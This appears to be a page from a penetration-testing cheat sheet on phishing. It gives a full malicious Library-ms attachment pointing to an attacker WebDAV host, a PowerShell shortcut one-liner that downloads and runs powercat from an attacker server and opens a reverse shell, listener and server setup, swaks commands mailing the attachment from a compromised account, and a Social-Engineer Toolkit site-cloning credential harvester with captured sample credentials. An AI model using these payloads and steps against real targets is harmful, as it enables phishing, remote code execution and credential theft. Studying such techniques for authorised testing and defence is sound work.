Phising

Attachment

Create a malicious attachment (config.Library-ms) and include the attacker host's IP address within the <url> tags (line 15):

Create the attachment on a Windows host!

Library-ms is a Windows-specific file format, and it must follow a specific XML structure with Windows metadata.
If it is created it on Linux, even with the same contents, it might not be recognized or executed properly by Windows.

config.Library-ms

<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
<name>@windows.storage.dll,-34582</name>
<version>6</version>
<isLibraryPinned>true</isLibraryPinned>
<iconReference>imageres.dll,-1003</iconReference>
<templateInfo>
<folderType>{7d49d726-3c21-4f05-99aa-fdc2c9474656}</folderType>
</templateInfo>
<searchConnectorDescriptionList>
<searchConnectorDescription>
<isDefaultSaveLocation>true</isDefaultSaveLocation>
<isSupported>false</isSupported>
<simpleLocation>
<url>http://172.16.42.42</url>
</simpleLocation>
</searchConnectorDescription>
</searchConnectorDescriptionList>
</libraryDescription>

Create a malicious PowerShell shortcut pointing first to an attacker-controlled HTTP server and then to an attacker-controlled listener:

powershell.exe -c "IEX(New-Object System.Net.WebClient).DownloadString('http://<attacker_IP>:8000/powercat.ps1');powercat -c <attacker_IP> -p 4444 -e powershell"

Transfer both files to the attacking host under /webdav and start the server from within that directory:

# List the directory's contents 
$ ls
config.Library-ms  powershell.lnk

# Start the WEBDAV server
$ sudo wsgidav --host=0.0.0.0 --port=80 --root=./ --auth=anonymous

Start the HTTP server and the listener:

# List the directory's contents 
$ ls
powercat.ps1

# Start the HTTP server
$ python3 -m http.server 8000
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...

# Start the listener
$ sudo nc -lnvp 4444

Send the phising email along with the malicious attachment:

# Send the phising email to jim
$ swaks --to target@example.com --from compromized-email@example.com --header "Subject: Important!!!" --body @body.txt --attach @config.Library-ms --server 192.168.X.189 --auth LOGIN --auth-user compromized-email@example.com --auth-password 'Pass123!'

Site Clone

The Social Engineering Toolkit can be used to automate the process:

We can manually run setoolkit and select the options Social-Engineering Attacks → Website Attack Vectors > Credential Harvester Attack > Site Cloner.

We can also the above choices and required input using seautomate:

$ cat set_commands.txt
1
2
3
2
10.10.14.15
https://example.com/login.aspx

$ sudo ./seautomate set_commands.txt
...
[*] Cloning the website: https://example.com/login.aspx
[*] This could take a little bit...

The best way to use this attack is if username and password form fields are available. Regardless, this captures all POSTs on a website.
[*] The Social-Engineer Toolkit Credential Harvester Attack
[*] Credential Harvester is running on port 80
[*] Information will be displayed to you as it arrives below:

We can then send our phising email:

swaks --to sales@domain.com --from it@domain.com --server 10.13.14.15 --port 25 --body @email_body.txt

$ sudo ./seautomate set_commands.txt
...
[*] Information will be displayed to you as it arrives below:
[*] WE GOT A HIT! Printing the output:
POSSIBLE USERNAME FIELD FOUND: LoginType=Explicit
POSSIBLE USERNAME FIELD FOUND: user=username123
POSSIBLE PASSWORD FIELD FOUND: password=Password123!
PARAM: domain=LAB.LOCAL
[*] WHEN YOU'RE FINISHED, HIT CONTROL-C TO GENERATE A REPORT.

PreviousSocial Engineering NextWeb

Last updated 24 days ago

Was this helpful?